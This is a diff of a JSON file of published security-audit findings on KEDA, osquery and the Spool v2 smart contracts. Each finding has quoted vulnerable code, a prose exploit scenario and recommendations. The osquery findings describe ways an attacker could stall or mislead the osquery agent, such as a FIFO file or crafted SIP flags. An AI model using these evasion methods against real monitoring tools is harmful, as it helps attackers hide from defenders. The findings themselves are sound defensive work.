incorrectly check whether a strategy is a ghost strategy after checking that the strategy has a ROLE_STRATEGY role. function emergencyWithdraw( address [] calldata strategies, uint256 [][] calldata withdrawalSlippages, bool removeStrategies ) external onlyRole(ROLE_EMERGENCY_WITHDRAWAL_EXECUTOR, msg.sender ) { for ( uint256 i; i < strategies.length; ++i) { _checkRole(ROLE_STRATEGY, strategies[i]); if (strategies[i] == _ghostStrategy) { continue ; } [...] Figure 21.1: A snippet of the emergencyWithdraw function in spool-v2-core/StrategyRegistry.sol#L456-L465 function redeemStrategyShares( address [] calldata strategies, uint256 [] calldata shares, uint256 [][] calldata withdrawalSlippages ) external { for ( uint256 i; i < strategies.length; ++i) { _checkRole(ROLE_STRATEGY, strategies[i]); if (strategies[i] == _ghostStrategy) { continue ; } [...] Figure 21.2: A snippet of the redeemStrategyShares function in spool-v2-core/StrategyRegistry.sol#L477-L486 A ghost strategy will never have the ROLE_STRATEGY role, so both functions will always incorrectly revert if a ghost strategy is passed in the strategies array. Exploit Scenario Bob calls redeemStrategyShares with the ghost strategy in strategies and the transaction unexpectedly reverts. Recommendations Short term, modify the affected functions so that they verify whether the given strategy is a ghost strategy before checking the role with _checkRole . Long term, clearly document which roles a contract should have and implement the appropriate checks to verify them.", "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: Undetermined" - ] - }, - { - "title": "7. Insufficient check against nil ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", - "body": "Within a function in the scaler for Azure event hubs, the object partitionInfo is dereferenced before correctly checking it against nil . Before the object is used, a check confirms that partitionInfo is not nil. 
However, this check is insufficient because the function returns if the condition is met, and the function subsequently uses partitionInfo without additional checks against nil . As a result, a panic may occur when partitionInfo is later used in the same function. func (s *azureEventHubScaler) GetUnprocessedEventCountInPartition(ctx context.Context, partitionInfo *eventhub.HubPartitionRuntimeInformation) (newEventCount int64 , checkpoint azure.Checkpoint, err error ) { // if partitionInfo.LastEnqueuedOffset = -1, that means event hub partition is empty if partitionInfo != nil && partitionInfo.LastEnqueuedOffset == \"-1\" { return 0 , azure.Checkpoint{}, nil } checkpoint, err = azure.GetCheckpointFromBlobStorage(ctx, s.httpClient, s.metadata.eventHubInfo, partitionInfo.PartitionID ) Figure 7.1: partitionInfo is dereferenced before a nil check pkg/scalers/azure_eventhub_scaler.go#L253-L259 Exploit Scenario While the Azure event hub scaler performs its usual operations, an application error causes GetUnprocessedEventCountInPartition to be called with a nil partitionInfo parameter. This causes a panic and the scaler to crash and to stop monitoring events. Recommendations Short term, edit the code so that partitionInfo is checked against nil before dereferencing it. Long term, use CodeQL and its go/missing-error-check query to detect future instances of this issue.", "labels": [ "Trail of Bits", "Severity: Medium", "Difficulty: Undetermined" ] }, { - "title": "8. Prometheus metrics server does not support authentication ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", - "body": "When scraping metrics, Prometheus supports multiple forms of authentication , including Basic authentication, Bearer authentication, and OAuth 2.0. KEDA exposes Prometheus metrics but does not offer the ability to protect its metrics server with any of the supported authentication types. Exploit Scenario A user deploys KEDA on a network. An adversary gains access to the network and is able to issue HTTP requests to KEDA's Prometheus metrics server. As KEDA does not support authentication for the server, the attacker can trivially view the exposed metrics. Recommendations Short term, implement one or more of the authentication types that Prometheus supports for scrape targets.", + "title": "22. Reward configuration not initialized properly when reward is zero ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The RewardManager.addToken function, which adds a new reward token for the given smart vault, does not initialize all configuration variables when the initial reward is zero. As a result, all calls to the RewardManager.extendRewardEmission function will fail, and rewards cannot be added for that vault. RewardManager.addToken adds a new reward token for the given smart vault. The reward tokens for a smart vault are tracked using the RewardManager.rewardConfiguration function. The tokenAdded value of the configuration is used to check whether the token has already been added for the vault (figure 22.1). 
function addToken ( address smartVault , IERC20 token, uint32 rewardsDuration , uint256 reward ) external onlyAdminOrVaultAdmin(smartVault, msg.sender ) exceptUnderlying(smartVault, token) { RewardConfiguration storage config = rewardConfiguration [smartVault][token]; if (tokenBlacklist[smartVault][token]) revert RewardTokenBlacklisted( address (token)); if ( config.tokenAdded != 0 ) revert RewardTokenAlreadyAdded( address (token)); if (rewardsDuration == 0 ) revert InvalidRewardDuration(); if (rewardTokensCount[smartVault] > 5 ) revert RewardTokenCapReached(); rewardTokens[smartVault][rewardTokensCount[smartVault]] = token; rewardTokensCount[smartVault]++; config.rewardsDuration = rewardsDuration; if ( reward > 0 ) { _extendRewardEmission(smartVault, token, reward); } } Figure 22.1: The addToken function in spool-v2-core/RewardManager.sol#L81-L101 However, RewardManager.addToken does not update config.tokenAdded , and the _extendRewardEmission function, which updates config.tokenAdded , is called only when the reward is greater than zero. RewardManager.extendRewardEmission is the only entry point to add rewards for a vault. It checks whether the token has been previously added by verifying that tokenAdded is greater than zero (figure 22.2). function extendRewardEmission ( address smartVault , IERC20 token, uint256 reward , uint32 rewardsDuration ) external onlyAdminOrVaultAdmin(smartVault, msg.sender ) exceptUnderlying(smartVault, token) { if (tokenBlacklist[smartVault][token]) revert RewardTokenBlacklisted( address (token)); if (rewardsDuration == 0 ) revert InvalidRewardDuration(); if ( rewardConfiguration[smartVault][token].tokenAdded == 0 ) { revert InvalidRewardToken( address (token)); } [...] } Figure 22.2: The extendRewardEmission function in spool-v2-core/RewardManager.sol#L106-L119 Because tokenAdded is not initialized when the initial rewards are zero, the vault admin cannot add the rewards for the vault in that token. The impact of this issue is lower because the vault admin can use the RewardManager.removeReward function to remove the token and add it again with a nonzero initial reward. Note that the vault admin can only remove the token without blacklisting it because the config.periodFinish value is also not initialized when the initial reward is zero. Exploit Scenario Alice is the admin of a smart vault. She adds a reward token for her smart vault with the initial reward set to zero. Alice tries to add rewards using extendRewardEmission , and the transaction fails. She cannot add rewards for her smart vault. She has to remove the token and re-add it with a nonzero initial reward. Recommendations Short term, use a separate Boolean variable to track whether a token has been added for a smart vault, and have RewardManager.addToken initialize that variable (a minimal sketch follows this entry). Long term, improve the system's unit tests to cover all execution paths.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Undetermined" + "Severity: Low", + "Difficulty: Low" ] }, { - "title": "1. Project dependencies are not monitored for vulnerabilities ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", - "body": "The osquery project depends on a large number of dependencies to realize the functionality of the existing tables. They are included as Git submodules in the project. 
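A minimal sketch for finding 22's short-term recommendation above, using a hypothetical dedicated Boolean (the rewardTokenAdded name is an assumption, not from the codebase):

    // Hypothetical new state, set unconditionally in addToken:
    mapping(address => mapping(IERC20 => bool)) public rewardTokenAdded;

    // Inside addToken, before the reward > 0 branch:
    rewardTokenAdded[smartVault][token] = true; // set even when reward == 0

    // Inside extendRewardEmission, replacing the tokenAdded == 0 check:
    if (!rewardTokenAdded[smartVault][token]) {
        revert InvalidRewardToken(address(token));
    }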
The build mechanism of each dependency has been rewritten to suit the specific needs of osquery (e.g., so that it has as few dynamically loaded libraries as possible), but there is no process in place to detect published vulnerabilities in the dependencies. As a result, osquery could continue to use code with known vulnerabilities in the dependency projects. Exploit Scenario An attacker, who has gained a foothold on a machine running osquery, leverages an existing vulnerability in a dependency to exploit osquery. He escalates his privileges to those of the osquery agent or carries out a denial-of-service attack to block the osquery agent from sending data. Recommendations Short term, regularly update the dependencies to their latest versions. Long term, establish a process within the osquery project to detect published vulnerabilities in its dependencies.", + "title": "23. Missing function for removing reward tokens from the blacklist ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "A Spool admin can blacklist a reward token for a smart vault through the RewardManager contract, but they cannot remove it from the blacklist. As a result, a reward token cannot be used again once it is blacklisted. The RewardManager.forceRemoveReward function blacklists the given reward token by updating the RewardManager.tokenBlacklist array (figure 23.1). Blacklisted tokens cannot be used as rewards. function forceRemoveReward ( address smartVault , IERC20 token) external onlyRole(ROLE_SPOOL_ADMIN, msg.sender ) { tokenBlacklist[smartVault][token] = true ; _removeReward(smartVault, token); delete rewardConfiguration[smartVault][token]; } Figure 23.1: The forceRemoveReward function in spool-v2-core/RewardManager.sol#L160-L165 However, RewardManager does not have a function to remove tokens from the blacklist. As a result, if the Spool admin accidentally blacklists a token, then the smart vault admin will never be able to use that token to send rewards. Exploit Scenario Alice is the admin of a smart vault. She adds WETH and token A as rewards. The value of token A declines rapidly, so a Spool admin decides to blacklist the token for Alice's vault. The Spool admin accidentally supplies the WETH address in the call to forceRemoveReward . As a result, WETH is blacklisted, and Alice cannot send rewards in WETH. Recommendations Short term, add a function with the proper access controls to remove tokens from the blacklist (a minimal sketch follows this entry). Long term, improve the system's unit tests to cover all execution paths.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: High" + "Severity: Informational", + "Difficulty: High" ] }, { - "title": "2. No separation of privileges when executing dependency code ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", - "body": "In several places in the codebase, the osquery agent realizes the functionality of a table by invoking code in a dependency project. For example, the yara table is implemented by invoking code in libyara. However, there is no separation of privileges or sandboxing in place when the code in the dependency library is called, so the library code executes with the same privileges as the osquery agent. Considering the project's numerous dependencies, this issue increases the osquery agent's attack surface and would exacerbate the effects of any vulnerabilities in the dependencies. 
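A minimal sketch of the un-blacklisting entry point recommended in finding 23 above, reusing the access-control pattern shown in figure 23.1 (the function name is an assumption):

    function removeFromBlacklist(address smartVault, IERC20 token)
        external
        onlyRole(ROLE_SPOOL_ADMIN, msg.sender)
    {
        // Allow the token to be used as a reward again.
        tokenBlacklist[smartVault][token] = false;
    }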
Exploit Scenario An attacker finds a vulnerability in a dependency library that allows her to gain code execution, and she elevates her privileges to that of the osquery agent. Recommendations Short term, regularly update the dependencies to their latest versions. Long term, create a security barrier against the dependency library code to minimize the impact of vulnerabilities.", + "title": "24. Risk of unclaimed shares due to loss of precision in reallocation operations ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The ReallocationLib.calculateReallocation function releases strategy shares and calculates their USD value. The USD value is later converted into strategy shares in the ReallocationLib.doReallocation function. Because the conversion operations always round down, the number of shares calculated in doReallocation will be less than the shares released in calculateReallocation . As a result, some shares released in calculateReallocation will be unclaimed, as ReallocationLib distributes only the shares computed in doReallocation . ReallocationLib.calculateReallocation calculates the USD value that needs to be withdrawn from each of the strategies used by smart vaults (figure 24.1). The smart vaults release the shares equivalent to the calculated USD value. /** * @dev Calculates reallocation needed per smart vault. [...] * @return Reallocation of the smart vault: * - first index is 0 or 1 * - 0: * - second index runs over smart vault's strategies * - value is USD value that needs to be withdrawn from the strategy [...] */ function calculateReallocation ( [...] ) private returns ( uint256 [][] memory ) { [...] } else if (targetValue < currentValue) { // This strategy needs withdrawal. [...] IStrategy(smartVaultStrategies[i]). releaseShares (smartVault, sharesToRedeem ); // Recalculate value to withdraw based on released shares. reallocation[ 0 ][i] = IStrategy(smartVaultStrategies[i]).totalUsdValue() * sharesToRedeem / IStrategy(smartVaultStrategies[i]).totalSupply(); } } return reallocation ; } Figure 24.1: The calculateReallocation function in spool-v2-core/ReallocationLib.sol#L161-L207 The ReallocationLib.buildReallocationTable function calculates the reallocationTable value. The reallocationTable[i][j][0] value represents the USD amount that should move from strategy i to strategy j (figure 24.2). These USD amounts are calculated using the USD values of the released shares computed in ReallocationLib.calculateReallocation (represented by reallocation[0][i] in figure 24.1). /** [...] * @return Reallocation table: * - first index runs over all strategies i * - second index runs over all strategies j * - third index is 0, 1 or 2 * - 0: value represent USD value that should be withdrawn by strategy i and deposited into strategy j */ function buildReallocationTable ( [...] ) private pure returns ( uint256 [][][] memory ) { Figure 24.2: A snippet of buildReallocationTable function in spool-v2-core/ReallocationLib.sol#L209-L228 ReallocationLib.doReallocation calculates the total USD amount that should be withdrawn from a strategy (figure 24.3). This total USD amount is exactly equal to the sum of the USD values needed to be withdrawn from the strategy for each of the smart vaults. The doReallocation function converts the total USD value to the equivalent number of strategy shares. 
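A toy example with assumed numbers illustrates the dust. Suppose a strategy has totalSupply = 7 shares worth totalUsdValue = 10 USD, and two smart vaults each release 3 shares. calculateReallocation values each release at floor(10 * 3 / 7) = 4 USD, so the reallocation table carries 8 USD in total; doReallocation then converts back to shares as floor(7 * 8 / 10) = 5. Of the 6 released shares, only 5 are distributed, leaving 1 share stranded as dust.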
The ReallocationLib library withdraws this exact number of shares from the strategy and distributes them to other strategies that require deposits of these shares. function doReallocation ( [...] uint256 [][][] memory reallocationTable ) private { // Distribute matched shares and withdraw unamatched ones. for ( uint256 i ; i < strategies.length; ++i) { [...] { uint256 [ 2 ] memory totals; // totals[0] -> total withdrawals for ( uint256 j ; j < strategies.length; ++j) { totals[ 0 ] += reallocationTable[i][j][ 0 ] ; [...] } // Calculate amount of shares to redeem and to distribute. uint256 sharesToDistribute = // first store here total amount of shares that should have been withdrawn IStrategy(strategies[i]).totalSupply() * totals[ 0 ] / IStrategy(strategies[i]).totalUsdValue(); [...] } [...] Figure 24.3: A snippet of the doReallocation function in spool-v2-core/ReallocationLib.sol#L285-L350 Theoretically, the shares calculated for a strategy should be equal to the shares released by all of the smart vaults for that strategy. However, there is a loss of precision in both the calculateReallocation function's calculation of the USD value of released shares and the doReallocation function's conversion of the combined USD value to strategy shares. As a result, the number of shares released by all of the smart vaults will be less than the shares calculated in calculateReallocation . Because the ReallocationLib library only distributes these calculated shares, there will be some unclaimed strategy shares as dust. It is important to note that the rounding error could be greater than one in the context of multiple smart vaults. Additionally, the error could be even greater if the conversion results were rounded in the opposite direction: in that case, if the calculated shares were greater than the released shares, the reallocation would fail when burn and claim operations are executed. Recommendations Short term, modify the code so that it stores the number of shares released in calculateReallocation , and implement dustless calculations to build the reallocationTable value with the share amounts and the USD amounts. Have doReallocation use this reallocationTable value to calculate the value of sharesToDistribute . Long term, use Echidna to test system and mathematical invariants.", "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: Undetermined" + "Difficulty: Low" ] }, { - "title": "3. No limit on the amount of information that can be read from the Firefox add-ons table ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", - "body": "The implementation of the Firefox add-ons table has no limit on the amount of information that it can read from JSON files while enumerating the add-ons installed on a user profile. This is because to directly read and parse the Firefox profile JSON file, the parseJSON implementation in the osquery agent uses boost::property_tree, which does not have this limit. pt::ptree tree; if (!osquery::parseJSON(path + kFirefoxExtensionsFile, tree).ok()) { TLOG << \"Could not parse JSON from: \" << path + kFirefoxExtensionsFile; return; } Figure 3.1: The osquery::parseJSON function has no limit on the amount of data it can read. Exploit Scenario An attacker crafts a large, valid JSON file and stores it on the Firefox profile path as extensions.json (e.g., in ~/Library/Application Support/Firefox/Profiles/foo/extensions.json on a macOS system). 
When osquery executes a query using the firefox_addons table, the parseJSON function reads and parses the complete file, causing high resource consumption. Recommendations Short term, enforce a maximum file size within the Firefox table, similar to the limits on other tables in osquery. Long term, consider removing osquery::parseJSON and implementing a single, standard way to parse JSON files across osquery. The osquery project currently uses both boost::property_tree and RapidJSON libraries to parse JSON files, resulting in the use of different code paths to handle untrusted content.", + "title": "25. Curve3CoinPoolAdapter's _addLiquidity reverts due to incorrect amounts deposited ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The _addLiquidity function loops through the amounts array, whose last element is used by the Strategy.doHardWork function to keep track of whether deposits need to be made. As a result, _addLiquidity overwrites the number of tokens to send for the first asset, causing far fewer tokens to be deposited than expected, thus causing the transaction to revert due to the slippage check. function _addLiquidity( uint256 [] memory amounts, uint256 slippage) internal { uint256 [N_COINS] memory curveAmounts; for ( uint256 i; i < amounts.length; ++i) { curveAmounts[assetMapping().get(i)] = amounts[i]; } ICurve3CoinPool(pool()).add_liquidity(curveAmounts, slippage); } Figure 25.1: The _addLiquidity function in spool-v2-core/CurveAdapter.sol#L12-L20 The last element in the doHardWork function's assetsToDeposit array keeps track of the deposits to be made and is incremented by one on each iteration of assets in assetGroup if that asset has tokens to deposit. This variable is then passed to the _depositToProtocol function and then, for strategies that use the Curve3CoinPoolAdapter , is passed to _addLiquidity in the amounts parameter. When _addLiquidity iterates over the last element in the amounts array, the assetMapping().get(i) function will return 0 because entry i is not initialized in assetMapping . This return value will overwrite the number of tokens to deposit for the first asset with a strictly smaller amount. function doHardWork(StrategyDhwParameterBag calldata dhwParams) external returns (DhwInfo memory dhwInfo) { _checkRole(ROLE_STRATEGY_REGISTRY, msg.sender ); // assetsToDeposit[0..token.length-1]: amount of asset i to deposit // assetsToDeposit[token.length]: is there anything to deposit uint256 [] memory assetsToDeposit = new uint256 [](dhwParams.assetGroup.length + 1); unchecked { for ( uint256 i; i < dhwParams.assetGroup.length; ++i) { assetsToDeposit[i] = IERC20(dhwParams.assetGroup[i]).balanceOf(address(this)); if (assetsToDeposit[i] > 0) { ++assetsToDeposit[dhwParams.assetGroup.length]; } } } [...] // - deposit assets into the protocol _depositToProtocol(dhwParams.assetGroup, assetsToDeposit, dhwParams.slippages); Figure 25.2: A snippet of the doHardWork function in spool-v2-core/Strategy.sol#L71-L75 Exploit Scenario The doHardWork function is called for a smart vault that uses the ConvexAlusdStrategy strategy; however, the subsequent call to _addLiquidity reverts due to the incorrect number of assets that it is trying to deposit. The smart vault is unusable. Recommendations Short term, have _addLiquidity loop over the amounts array N_COINS times instead of its full length (sketched below). 
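One possible shape of that short-term fix, a minimal sketch bounding the loop by N_COINS so the trailing bookkeeping element is never mapped:

    function _addLiquidity(uint256[] memory amounts, uint256 slippage) internal {
        uint256[N_COINS] memory curveAmounts;
        // Only the first N_COINS entries are real asset amounts; the trailing
        // element is Strategy.doHardWork's deposit flag and must be skipped.
        for (uint256 i; i < N_COINS; ++i) {
            curveAmounts[assetMapping().get(i)] = amounts[i];
        }
        ICurve3CoinPool(pool()).add_liquidity(curveAmounts, slippage);
    }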
Long term, refactor the Strategy.doHardWork function so that it does not use an additional element in the assetsToDeposit array to keep track of whether deposits need to be made. Instead, use a separate Boolean variable. The current pattern is too error-prone.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Medium", "Difficulty: Low" ] }, { - "title": "4. The SIP status on macOS may be misreported ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", - "body": "If System Integrity Protection (SIP) is disabled on a Mac running osquery, the SIP configuration table might not report the correct value in the enabled column for the config_flag: sip row. For this misreporting to happen, extra flags need to be present in the value returned by csr_get_active_config and absent in the osquery kRootlessConfigFlags list. This is the case for the flags CSR_ALLOW_ANY_RECOVERY_OS, CSR_ALLOW_UNAPPROVED_KEXTS, CSR_ALLOW_EXECUTABLE_POLICY_OVERRIDE, and CSR_ALLOW_UNAUTHENTICATED_ROOT in xnu-7195.141.2/bsd/sys/csr.h (compare figure 4.1 and figure 4.3). /* CSR configuration flags */ #define CSR_ALLOW_UNTRUSTED_KEXTS (1 << 0) #define CSR_ALLOW_UNRESTRICTED_FS (1 << 1) #define CSR_ALLOW_TASK_FOR_PID (1 << 2) #define CSR_ALLOW_KERNEL_DEBUGGER (1 << 3) #define CSR_ALLOW_APPLE_INTERNAL (1 << 4) #define CSR_ALLOW_DESTRUCTIVE_DTRACE (1 << 5) /* name deprecated */ #define CSR_ALLOW_UNRESTRICTED_DTRACE (1 << 5) #define CSR_ALLOW_UNRESTRICTED_NVRAM (1 << 6) #define CSR_ALLOW_DEVICE_CONFIGURATION (1 << 7) #define CSR_ALLOW_ANY_RECOVERY_OS (1 << 8) #define CSR_ALLOW_UNAPPROVED_KEXTS (1 << 9) #define CSR_ALLOW_EXECUTABLE_POLICY_OVERRIDE (1 << 10) #define CSR_ALLOW_UNAUTHENTICATED_ROOT (1 << 11) Figure 4.1: The CSR flags in xnu-7159.141.2 QueryData results; csr_config_t config = 0; csr_get_active_config(&config); csr_config_t valid_allowed_flags = 0; for (const auto& kv : kRootlessConfigFlags) { valid_allowed_flags |= kv.second; } Row r; r[\"config_flag\"] = \"sip\"; if (config == 0) { // SIP is enabled (default) r[\"enabled\"] = INTEGER(1); r[\"enabled_nvram\"] = INTEGER(1); } else if ((config | valid_allowed_flags) == valid_allowed_flags) { // mark SIP as NOT enabled (i.e. disabled) if // any of the valid_allowed_flags is set r[\"enabled\"] = INTEGER(0); r[\"enabled_nvram\"] = INTEGER(0); } results.push_back(r); Figure 4.2: How the SIP state is computed in genSIPConfig // rootless configuration flags // https://opensource.apple.com/source/xnu/xnu-3248.20.55/bsd/sys/csr.h const std::map kRootlessConfigFlags = { // CSR_ALLOW_UNTRUSTED_KEXTS {\"allow_untrusted_kexts\", (1 << 0)}, // CSR_ALLOW_UNRESTRICTED_FS {\"allow_unrestricted_fs\", (1 << 1)}, // CSR_ALLOW_TASK_FOR_PID {\"allow_task_for_pid\", (1 << 2)}, // CSR_ALLOW_KERNEL_DEBUGGER {\"allow_kernel_debugger\", (1 << 3)}, // CSR_ALLOW_APPLE_INTERNAL {\"allow_apple_internal\", (1 << 4)}, // CSR_ALLOW_UNRESTRICTED_DTRACE {\"allow_unrestricted_dtrace\", (1 << 5)}, // CSR_ALLOW_UNRESTRICTED_NVRAM {\"allow_unrestricted_nvram\", (1 << 6)}, // CSR_ALLOW_DEVICE_CONFIGURATION {\"allow_device_configuration\", (1 << 7)}, }; Figure 4.3: The flags currently supported by osquery Exploit Scenario An attacker, who has gained a foothold with root privileges, disables SIP on a device running macOS and sets the csr_config flags to 0x3e7. When building the response for the sip_config table, osquery misreports the state of SIP. 
Recommendations Short term, consider reporting SIP as disabled if any flag is present or if any of the known flags are present (e.g., if (config & valid_allowed_flags) != 0). Long term, add support for reporting the raw flag values to the table specification and code so that the upstream server can make the final determination on the state of SIP, irrespective of the flags supported by the osquery daemon. Additionally, monitor for changes and add support for new flags as they are added in the macOS kernel.", + "title": "26. Reallocation process reverts when a ghost strategy is present ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The reallocation process reverts in multiple places when a ghost strategy is present. As a result, it is impossible to reallocate a smart vault with a ghost strategy. The first revert would occur in the mapStrategies function (figure 26.1). Users calling the reallocate function would not know to add the ghost strategy address in the strategies array, which holds the strategies that need to be reallocated. This function reverts if it does not find a strategy in the array. Even if the ghost strategy address is in strategies , a revert would occur in the areas described below. function mapStrategies( address [] calldata smartVaults, address [] calldata strategies, mapping ( address => address []) storage _smartVaultStrategies ) private view returns ( uint256 [][] memory ) { [...] // Loop over smart vault's strategies. for ( uint256 j; j < smartVaultStrategiesLength; ++j) { address strategy = smartVaultStrategies[j]; bool found = false ; // Try to find the strategy in the provided list of strategies. for ( uint256 k; k < strategies.length; ++k) { if (strategies[k] == strategy) { // Match found. found = true ; strategyMatched[k] = true ; // Add entry to the strategy mapping. strategyMapping[i][j] = k; break ; } } if (!found) { list // If a smart vault's strategy was not found in the provided // of strategies, this means that the provided list is invalid. revert InvalidStrategies(); } } } Figure 26.1: A snippet of the mapStrategies function in spool-v2-core/ReallocationLib.sol#L86-L144 During the reallocation process, the doReallocation function calls the beforeRedeemalCheck and beforeDepositCheck functions even on ghost strategies (figure 26.2); however, their implementation is to revert on ghost strategies with an IsGhostStrategy error (figure 26.3). function doReallocation( address [] calldata strategies, ReallocationParameterBag calldata reallocationParams, uint256 [][][] memory reallocationTable ) private { if (totals[0] == 0) { // There is nothing to withdraw from strategy i. IStrategy(strategies[i]).beforeRedeemalCheck(0, reallocationParams.withdrawalSlippages[i]); continue ; } // Calculate amount of shares to redeem and to distribute. uint256 sharesToDistribute = // first store here total amount of shares that should have been withdrawn IStrategy(strategies[i]).totalSupply() * totals[0] / IStrategy(strategies[i]).totalUsdValue(); IStrategy(strategies[i]).beforeRedeemalCheck( sharesToDistribute, reallocationParams.withdrawalSlippages[i] ); [...] // Deposit assets into the underlying protocols. for ( uint256 i; i < strategies.length; ++i) { IStrategy(strategies[i]).beforeDepositCheck(toDeposit[i], reallocationParams.depositSlippages[i]); [...] 
Figure 26.2: A snippet of the doReallocation function in spool-v2-core/ReallocationLib.sol#L285-L469 contract GhostStrategy is IERC20Upgradeable, IStrategy { [...] function beforeDepositCheck(uint256[] memory, uint256[] calldata) external pure { revert IsGhostStrategy(); } function beforeRedeemalCheck(uint256, uint256[] calldata) external pure { revert IsGhostStrategy(); } Figure 26.3: The beforeDepositCheck and beforeRedeemalCheck functions in spool-v2-core/GhostStrategy.sol#L98-L104 Exploit Scenario A strategy is removed from a smart vault. Bob, who has the ROLE_ALLOCATOR role, calls reallocate, but it reverts and the smart vault is impossible to reallocate. Recommendations Short term, modify the associated code so that ghost strategies are not passed to the reallocate function in the _smartVaultStrategies parameter. Long term, improve the system's unit and integration tests to test for smart vaults with ghost strategies. Such tests are currently missing.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Low" + "Severity: High", + "Difficulty: High" ] }, { - "title": "5. The OpenReadableFile function can hang on reading a file ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", - "body": "The OpenReadableFile function creates an instance of the PlatformFile class, which is used for reading and writing files. The constructor of PlatformFile uses the open syscall to obtain a handle to the file. The OpenReadableFile function by default opens the file using the O_NONBLOCK flag, but if PlatformFile's isSpecialFile method returns true, it opens the file without using O_NONBLOCK. On the POSIX platform, the isSpecialFile method returns true for files in which fstat returns a size of zero. If the file to be read is a FIFO, the open syscall in the second invocation of PlatformFile's constructor blocks the osquery thread until another thread opens the FIFO file to write to it. struct OpenReadableFile : private boost::noncopyable { public: explicit OpenReadableFile(const fs::path& path, bool blocking = false) : blocking_io(blocking) { int mode = PF_OPEN_EXISTING | PF_READ; if (!blocking) { mode |= PF_NONBLOCK; } // Open the file descriptor and allow caller to perform error checking. fd = std::make_unique<PlatformFile>(path, mode); if (!blocking && fd->isSpecialFile()) { // A special file cannot be read in non-blocking mode, reopen in blocking // mode mode &= ~PF_NONBLOCK; blocking_io = true; fd = std::make_unique<PlatformFile>(path, mode); } } public: std::unique_ptr<PlatformFile> fd{nullptr}; bool blocking_io; }; Figure 5.1: The OpenReadableFile function can block the osquery thread. Exploit Scenario An attacker creates a special file, such as a FIFO, in a path known to be read by the osquery agent. When the osquery agent attempts to open and read the file, it blocks the osquery thread indefinitely, in effect making osquery unable to report the status to the server. Recommendations Short term, ensure that the file operations in filesystem.cpp do not block the osquery thread. Long term, introduce a timeout on file operations so that a block does not stall the osquery thread. References The Single Unix Specification, Version 2", + "title": "27. 
Broken test cases that hide security issues ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "Multiple test cases do not check sufficient conditions to verify the correctness of the code, which could result in the deployment of buggy code in production and the loss of funds. The test_extendRewardEmission_ok test does not check the new reward rate and duration to verify the effect of the call to the extendRewardEmission function on the RewardManager contract: function test_extendRewardEmission_ok() public { deal(address(rewardToken), vaultOwner, rewardAmount * 2, true); vm.startPrank(vaultOwner); rewardToken.approve(address(rewardManager), rewardAmount * 2); rewardManager.addToken(smartVault, rewardToken, rewardDuration, rewardAmount); rewardManager.extendRewardEmission(smartVault, rewardToken, 1 ether, rewardDuration); vm.stopPrank(); } Figure 27.1: An insufficient test case for extendRewardEmission in spool-v2-core/RewardManager.t.sol The test_removeReward_ok test does not check the new reward token count and the deletion of the reward configuration for the smart vault to verify the effect of the call to the removeReward function on the RewardManager contract: function test_removeReward_ok() public { deal(address(rewardToken), vaultOwner, rewardAmount, true); vm.startPrank(vaultOwner); rewardToken.approve(address(rewardManager), rewardAmount); rewardManager.addToken(smartVault, rewardToken, rewardDuration, rewardAmount); skip(rewardDuration + 1); rewardManager.removeReward(smartVault, rewardToken); vm.stopPrank(); } Figure 27.2: An insufficient test case for removeReward in spool-v2-core/RewardManager.t.sol There is no test case to check the access controls of the removeReward function. Similarly, the test_forceRemoveReward_ok test does not check the effects of the forced removal of a reward token. Findings TOB-SPL-28 and TOB-SPL-29 were not detected by tests because of these broken test cases. The test_removeStrategy_betweenFlushAndDHW test does not check the balance of the master wallet. The test_removeStrategy_betweenFlushAndDhwWithdrawals test removes the strategy before the do hard work execution of the deposit cycle instead of removing it before the do hard work execution of the withdrawal cycle, making this test case redundant. Finding TOB-SPL-33 would have been detected if this test had been correctly implemented. There may be other broken tests that we did not find, as we could not cover all of the test cases. Exploit Scenario The Spool team deploys the protocol. After some time, the Spool team makes some changes to the code that introduce a bug that goes unnoticed due to the broken test cases. The team deploys the new changes with confidence in their tests and ends up introducing a security issue in the production deployment of the protocol. Recommendations Short term, fix the test cases described above. Long term, review all of the system's test cases and make sure that they verify the given state change correctly and sufficiently after an interaction with the protocol. Use Necessist to find broken test cases and fix them.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -4852,113 +7500,113 @@ ] }, { - "title": "6. 
Methods in POSIX PlatformFile class are susceptible to race conditions ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", - "body": "The POSIX implementation of the methods in the PlatformFile class includes several methods that return the current properties of a file. However, the properties can change during the lifetime of the file descriptor, so the return values of these methods may not reflect the actual properties. For example, the isSpecialFile method, which is used to determine the strategy for reading the file, calls the size method. However, the file size can change between the time of the call and the reading operation, in which case the wrong strategy for reading the file could be used. bool PlatformFile::isSpecialFile() const { return (size() == 0); } static uid_t getFileOwner(PlatformHandle handle) { struct stat file; if (::fstat(handle, &file) < 0) { return -1; } return file.st_uid; } Status PlatformFile::isOwnerRoot() const { if (!isValid()) { return Status(-1, \"Invalid handle_\"); } uid_t owner_id = getFileOwner(handle_); if (owner_id == (uid_t)-1) { return Status(-1, \"fstat error\"); } if (owner_id == 0) { return Status::success(); } return Status(1, 